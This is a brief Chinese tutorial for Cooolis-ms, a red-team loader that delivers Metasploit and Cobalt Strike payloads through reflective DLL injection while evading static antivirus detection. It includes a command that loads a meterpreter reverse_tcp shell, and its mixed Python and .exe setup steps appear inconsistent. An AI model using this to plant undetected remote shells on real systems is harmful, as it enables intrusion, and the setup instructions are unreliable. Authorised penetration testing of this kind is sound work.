Cooolis-ms 项目使用教程
1. 项目介绍
Cooolis-ms 是一个包含了 Metasploit Payload Loader、Cobalt Strike External C2 Loader、Reflective DLL injection 的代码执行工具。它的定位在于能够在静态查杀上规避一些我们将要执行且含有特征的代码,帮助红队人员更方便快捷地从 Web 容器环境切换到 C2 环境进一步进行工作。
2. 项目快速启动
2.1 下载项目
首先,你需要从 GitHub 克隆项目到本地:
git clone https://github.com/Rvn0xsy/Cooolis-ms.git
2.2 安装依赖
进入项目目录并安装所需的依赖:
cd Cooolis-ms
pip install -r requirements.txt
2.3 启动服务
启动 Cooolis-ms 服务:
python server.py
2.4 使用示例
以下是一个简单的使用示例,展示了如何使用 Cooolis-ms 加载 Metasploit Payload:
./Cooolis-ms.exe metasploit -H 127.0.0.1 -P 8899 -p windows/meterpreter/reverse_tcp -o LHOST=127.0.0.1,LPORT=8866
3. 应用案例和最佳实践
3.1 红队渗透测试
在红队渗透测试中,Cooolis-ms 可以帮助红队人员快速从 Web 容器环境切换到 C2 环境,通过加载 Metasploit Payload 或 Cobalt Strike External C2 Loader,实现对目标系统的进一步控制。
3.2 静态查杀规避
Cooolis-ms 通过借鉴 MemoryModule 和 ReflectiveDLLInjection 技术,减少了代码执行的特征,降低了被静态查杀的风险。
4. 典型生态项目
4.1 Metasploit
Metasploit 是一个广泛使用的渗透测试框架,Cooolis-ms 通过实现 Metasploit RPC 服务客户端的功能,使得 Cooolis-ms 的服务端能够发送任意载荷,提高了其灵活性。
4.2 Cobalt Strike
Cobalt Strike 是一个商业化的渗透测试工具,Cooolis-ms 通过实现 Cobalt Strike External C2 Loader,使得红队人员能够更方便地与 Cobalt Strike 进行集成。
4.3 Reflective DLL Injection
Reflective DLL Injection 是一种在内存中加载 DLL 的技术,Cooolis-ms 借鉴了这一技术,实现了反射 DLL 的加载执行和注入,进一步减少了代码执行的特征。
通过以上模块的介绍,你可以快速了解并上手使用 Cooolis-ms 项目。